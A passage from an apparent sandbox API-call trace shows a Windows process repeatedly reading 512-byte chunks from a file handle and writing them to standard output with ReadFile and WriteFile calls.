lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.164] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.164] GetFileType (hFile=0x50) returned 0x1 [0218.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.165] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] GetFileType (hFile=0x50) returned 0x1 [0218.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.165] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] GetFileType (hFile=0x50) returned 0x1 [0218.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.166] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.166] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.166] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.167] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] GetFileType (hFile=0x50) returned 0x1 [0218.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.167] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.168] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] GetFileType (hFile=0x50) returned 0x1 [0218.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.168] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.169] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.169] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] GetFileType (hFile=0x50) returned 0x1 [0218.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.169] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.170] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.170] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.171] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.171] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.171] GetFileType (hFile=0x50) returned 0x1 [0218.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.172] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] GetFileType (hFile=0x50) returned 0x1 [0218.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.172] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.173] GetFileType (hFile=0x50) returned 0x1 